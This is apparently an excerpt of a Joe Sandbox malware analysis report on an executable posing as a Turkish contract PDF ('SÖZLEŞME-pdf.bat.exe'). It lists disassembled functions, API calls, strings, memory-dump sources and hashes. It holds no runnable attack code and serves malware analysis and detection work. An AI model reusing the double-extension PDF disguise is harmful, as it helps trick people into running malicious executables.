                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_701d0000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Global$Free$Alloc
                              • String ID:
                              • API String ID: 1780285237-0
                              • Opcode ID: 456dc5b569d17307c046ca3ad016183c0fbff2a1e6cdbb7142647a9dee1cb6fb
                              • Instruction ID: 3389ce2a621d0e5d0a4c2208ff314883d121ab4657c959a70edde0907926a7aa
                              • Opcode Fuzzy Hash: 456dc5b569d17307c046ca3ad016183c0fbff2a1e6cdbb7142647a9dee1cb6fb
                              • Instruction Fuzzy Hash: E3519EB6901202EFD700CF79C955A6A7BF8FB09715B228129FA46DBB20E775ED00CB50
                              Function 00402643 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll), ref: 0040269A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: lstrlen
                              • String ID: C:\Users\user\AppData\Local\Temp\nsp919B.tmp$C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll
                              • API String ID: 1659193697-920259709
                              • Opcode ID: 34c7efb81093797c11027e5546ec3e843140785abad449b49019a9492c78efcd
                              • Instruction ID: 24c820640bf83c35ca015f911653a3ecbd9f7363fc1a8715c972f2d02b23d4ac
                              • Opcode Fuzzy Hash: 34c7efb81093797c11027e5546ec3e843140785abad449b49019a9492c78efcd
                              • Instruction Fuzzy Hash: 11113A72A40311BBCB00BBB19E46EAE36709F50748F60443FF402F61C0D6FD4991565E
                              Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                              Download Yara Rule
                              APIs
                              • DestroyWindow.USER32(00000000,00000000,004031FC,?), ref: 00403031
                              • GetTickCount.KERNEL32 ref: 0040304F
                              • CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
                              • ShowWindow.USER32(00000000,00000005), ref: 0040307A
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                              • String ID:
                              • API String ID: 2102729457-0
                              • Opcode ID: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                              • Instruction ID: fc94ebd698381dfc42c8ec832a7b78cf8da54aaf5e1058e2af7a384a9ccf94d3
                              • Opcode Fuzzy Hash: 1f524868e2ec5e9a115d67c2f52ec07950574c6e8f58c79c8196e6c31eccfe04
                              • Instruction Fuzzy Hash: 0FF05471602621ABC6306F50BD08A9B7E69FB44B53F41087AF045B11A9CB7548828B9C
                              Function 0040551A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                              Download Yara Rule
                              APIs
                              • IsWindowVisible.USER32(?), ref: 00405549
                              • CallWindowProcW.USER32(?,?,?,?), ref: 0040559A
                                • Part of subcall function 004044EC: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Window$CallMessageProcSendVisible
                              • String ID:
                              • API String ID: 3748168415-3916222277
                              • Opcode ID: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                              • Instruction ID: 85372f17a9103eb01fcdfd8a19690b8d052d76dd043ca16804f8a0d8951f02ed
                              • Opcode Fuzzy Hash: 8a6e7ab2b2ebc920f12c2d5b2b2096f2e9954bb0ec9a095f665350d4b71d8349
                              • Instruction Fuzzy Hash: 53017171200609BFDF309F51DD80AAB362AFB84750F540437FA047A1D5C7B98D52AE69
                              Function 00403B5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                              Download Yara Rule
                              APIs
                              • FreeLibrary.KERNEL32(?,76BF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B36,00403A4C,?,?,00000008,0000000A,0000000C), ref: 00403B78
                              • GlobalFree.KERNEL32(00823A58), ref: 00403B7F
                              Strings
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B5E
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: Free$GlobalLibrary
                              • String ID: C:\Users\user\AppData\Local\Temp\
                              • API String ID: 1100898210-3355392842
                              • Opcode ID: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                              • Instruction ID: 6899552f53244e150386b1952d758f3f927a5bb415edc3c38dc9ad64461d36a3
                              • Opcode Fuzzy Hash: 628ac1cb43285a1a84ac4c7f875ed8910a03c7a164280e3efa8a6a131abbe062
                              • Instruction Fuzzy Hash: 59E08C3250102057CA211F05ED04B1AB7B8AF45B27F06452AE8407B26287B42C838FD8
                              Function 00405E3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe,C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe,80000000,00000003), ref: 00405E42
                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030EE,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe,C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe,80000000,00000003), ref: 00405E52
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: CharPrevlstrlen
                              • String ID: C:\Users\user\Desktop
                              • API String ID: 2709904686-3370423016
                              • Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                              • Instruction ID: eba18341e72c17137544591cfc51a7e4cac6184970473274e9d14fc4341c5a90
                              • Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
                              • Instruction Fuzzy Hash: 29D0A7F3400A30DAC3127708EC00D9F77ACEF16700746443AE580A7165D7785D818AEC
                              Function 00405F76 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F86
                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F9E
                              • CharNextA.USER32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FAF
                              • lstrlenA.KERNEL32(00000000,?,00000000,0040625B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB8
                              Memory Dump Source
                              • Source File: 00000000.00000002.23443388390.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.23443353422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443417752.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443446354.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.23443616853.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: lstrlen$CharNextlstrcmpi
                              • String ID:
                              • API String ID: 190613189-0
                              • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                              • Instruction ID: baa81b9806bcf2d0018ef5e19b9a589e3df5f1c452cb3fab7a363fd504aebd5e
                              • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                              • Instruction Fuzzy Hash: 87F0C231105914EFCB029BA5CE00D9EBFA8EF15254B2100BAE840F7250D638DE019BA8

                              Execution Graph

                              Execution Coverage:0%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:100%
                              Total number of Nodes:1
                              Total number of Limit Nodes:0
                              execution_graph 60420 32bd2b90 LdrInitializeThunk

                              Executed Functions

                              Function 32BD34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 4 32bd34e0-32bd34ec LdrInitializeThunk
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 418b9ea25c720d2bcb336af7b363426013bd8cedf30f4fb9e7f3cfc1071ef0c7
                              • Instruction ID: 84a1e95d84a5417cc20a4bc751bece0331a02c3d39489b0adb556520af32e110
                              • Opcode Fuzzy Hash: 418b9ea25c720d2bcb336af7b363426013bd8cedf30f4fb9e7f3cfc1071ef0c7
                              • Instruction Fuzzy Hash: D390023160550402D50062586724706100547D0201F61C816A4524529DD7A5995575E2
                              Function 32BD2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 32bd2b90-32bd2b9c LdrInitializeThunk
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 9b19b42da866e4e0bb3d026051e7828955a7df565b7df1369e42f7ba7b638e07
                              • Instruction ID: e1e91556bc0fa2df186c80074ddef0f3719520033f84616ec0c44766f2c01a73
                              • Opcode Fuzzy Hash: 9b19b42da866e4e0bb3d026051e7828955a7df565b7df1369e42f7ba7b638e07
                              • Instruction Fuzzy Hash: 4690023120148802D5106258A61474A000547D0301F55C816A8524619DD7A598957161
                              Function 32BD2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1 32bd2bc0-32bd2bcc LdrInitializeThunk
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 54795e68e910da9d55692765b562c2e5aaa8433a0a608b1e6ed9ec1e717b3713
                              • Instruction ID: c9a288ca419611405840fd009858ca2091c7aad5ef8c2bf1f2ba7620d05f2022
                              • Opcode Fuzzy Hash: 54795e68e910da9d55692765b562c2e5aaa8433a0a608b1e6ed9ec1e717b3713
                              • Instruction Fuzzy Hash: 1D90023120140402D50066987618646000547E0301F51D416A9124516ED77598957171
                              Function 32BD2EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 3 32bd2eb0-32bd2ebc LdrInitializeThunk
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 08a02ab89c95ea8d6cad1fa4e97f33e373dd8a74029c5f89fa44700f952d1412
                              • Instruction ID: 25fc37aa323358fe5ff95baf6edcfa286b646d1b0277fc13243d60c92086cf22
                              • Opcode Fuzzy Hash: 08a02ab89c95ea8d6cad1fa4e97f33e373dd8a74029c5f89fa44700f952d1412
                              • Instruction Fuzzy Hash: 8A90023120180402D50062586A2470B000547D0302F51C416A5264516DD735985575B1
                              Function 32BD2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2 32bd2d10-32bd2d1c LdrInitializeThunk
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 4a3c63e0578a9e9a3b3b2bda23d737f71f2296d5dab1f5061905edd7a2079738
                              • Instruction ID: 0fd7156406e5f1ec7cf1e281a9e26fab67f04dfb31a93b8d416d81a6b9b20e79
                              • Opcode Fuzzy Hash: 4a3c63e0578a9e9a3b3b2bda23d737f71f2296d5dab1f5061905edd7a2079738
                              • Instruction Fuzzy Hash: 8C90023120140413D51162586714707000947D0241F91C817A4524519DE7669956B161

                              Non-executed Functions

                              Function 32C3FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 678 32c3fdf4-32c3fe16 call 32be7be4 681 32c3fe35-32c3fe4d call 32b87662 678->681 682 32c3fe18-32c3fe30 RtlDebugPrintTimes 678->682 686 32c3fe53-32c3fe69 681->686 687 32c40277 681->687 688 32c402d1-32c402e0 682->688 689 32c3fe70-32c3fe72 686->689 690 32c3fe6b-32c3fe6e 686->690 691 32c4027a-32c402ce call 32c402e6 687->691 692 32c3fe73-32c3fe8a 689->692 690->692 691->688 694 32c3fe90-32c3fe93 692->694 695 32c40231-32c4023a GetPEB 692->695 694->695 697 32c3fe99-32c3fea2 694->697 699 32c4023c-32c40257 GetPEB call 32b8b910 695->699 700 32c40259-32c4025e call 32b8b910 695->700 703 32c3fea4-32c3febb call 32b9fed0 697->703 704 32c3febe-32c3fed1 call 32c40835 697->704 706 32c40263-32c40274 call 32b8b910 699->706 700->706 703->704 713 32c3fed3-32c3feda 704->713 714 32c3fedc-32c3fef0 call 32b8753f 704->714 706->687 713->714 717 32c3fef6-32c3ff02 GetPEB 714->717 718 32c40122-32c40127 714->718 719 32c3ff70-32c3ff7b 717->719 720 32c3ff04-32c3ff07 717->720 718->691 721 32c4012d-32c40139 GetPEB 718->721 726 32c3ff81-32c3ff88 719->726 727 32c40068-32c4007a call 32ba2710 719->727 722 32c3ff26-32c3ff2b call 32b8b910 720->722 723 32c3ff09-32c3ff24 GetPEB call 32b8b910 720->723 724 32c401a7-32c401b2 721->724 725 32c4013b-32c4013e 721->725 738 32c3ff30-32c3ff51 call 32b8b910 GetPEB 722->738 723->738 724->691 728 32c401b8-32c401c3 724->728 730 32c40140-32c4015b GetPEB call 32b8b910 725->730 731 32c4015d-32c40162 call 32b8b910 725->731 726->727 734 32c3ff8e-32c3ff97 726->734 750 32c40110-32c4011d call 32c40d24 call 32c40835 727->750 751 32c40080-32c40087 727->751 728->691 735 32c401c9-32c401d4 728->735 749 32c40167-32c4017b call 32b8b910 730->749 731->749 741 32c3ff99-32c3ffa9 734->741 742 32c3ffb8-32c3ffbc 734->742 735->691 744 32c401da-32c401e3 GetPEB 735->744 738->727 771 32c3ff57-32c3ff6b 738->771 741->742 743 32c3ffab-32c3ffb5 call 32c4d646 741->743 745 32c3ffce-32c3ffd4 742->745 746 32c3ffbe-32c3ffcc call 32bc3ae9 742->746 743->742 754 32c401e5-32c40200 GetPEB call 32b8b910 744->754 755 32c40202-32c40207 call 32b8b910 744->755 757 32c3ffd7-32c3ffe0 745->757 746->757 781 32c4017e-32c40188 GetPEB 749->781 750->718 760 32c40092-32c4009a 751->760 761 32c40089-32c40090 751->761 778 32c4020c-32c4022c call 32c3823a call 32b8b910 754->778 755->778 769 32c3fff2-32c3fff5 757->769 770 32c3ffe2-32c3fff0 757->770 762 32c4009c-32c400ac 760->762 763 32c400b8-32c400bc 760->763 761->760 762->763 773 32c400ae-32c400b3 call 32c4d646 762->773 775 32c400ec-32c400f2 763->775 776 32c400be-32c400d1 call 32bc3ae9 763->776 779 32c40065 769->779 780 32c3fff7-32c3fffe 769->780 770->769 771->727 773->763 786 32c400f5-32c400fc 775->786 792 32c400e3 776->792 793 32c400d3-32c400e1 call 32bbfdb9 776->793 778->781 779->727 780->779 785 32c40000-32c4000b 780->785 781->691 787 32c4018e-32c401a2 781->787 785->779 790 32c4000d-32c40016 GetPEB 785->790 786->750 791 32c400fe-32c4010e 786->791 787->691 795 32c40035-32c4003a call 32b8b910 790->795 796 32c40018-32c40033 GetPEB call 32b8b910 790->796 791->750 799 32c400e6-32c400ea 792->799 793->799 803 32c4003f-32c4005d call 32c3823a call 32b8b910 795->803 796->803 799->786 803->779
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                              • API String ID: 3446177414-1700792311
                              • Opcode ID: 9a9e5cd040a0ccc4f9c67209773d28220c1b50fc7270610e71f005c4da0f1095
                              • Instruction ID: 3cd5b67ea3db06e4b7ab0fa5e8fcebd2b342578cee0b1ad88f7567b96143cc19
                              • Opcode Fuzzy Hash: 9a9e5cd040a0ccc4f9c67209773d28220c1b50fc7270610e71f005c4da0f1095
                              • Instruction Fuzzy Hash: 2FD13635505685DFDB1ACFA4C840BAEBBF1FF49704F048899E848EB261CB39D981CB50
                              Function 32C3F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                              • API String ID: 3446177414-1745908468
                              • Opcode ID: 7637009a647da17fce2d84cfa745162ba1994658c09529a5115b399ceb7189d1
                              • Instruction ID: 6cb8c785898107b32585c62289e0c7810f339947382868f033161247ca1c7b4d
                              • Opcode Fuzzy Hash: 7637009a647da17fce2d84cfa745162ba1994658c09529a5115b399ceb7189d1
                              • Instruction Fuzzy Hash: 37912239906684DFDB06CFA4C840AADBBF1FF89314F048C59E648EB251CB7E9941CB50
                              Function 32B8640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                              Download Yara Rule
                              APIs
                              • RtlDebugPrintTimes.NTDLL ref: 32B8651C
                                • Part of subcall function 32B86565: RtlDebugPrintTimes.NTDLL ref: 32B86614
                                • Part of subcall function 32B86565: RtlDebugPrintTimes.NTDLL ref: 32B8665F
                              Strings
                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 32BE977C
                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 32BE9790
                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 32BE97B9
                              • minkernel\ntdll\ldrinit.c, xrefs: 32BE97A0, 32BE97C9
                              • apphelp.dll, xrefs: 32B86446
                              • LdrpInitShimEngine, xrefs: 32BE9783, 32BE9796, 32BE97BF
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                              • API String ID: 3446177414-204845295
                              • Opcode ID: f640d6a20495cdee582f343ed4c4455e64f42848e28a856d870ac273c01ae3b3
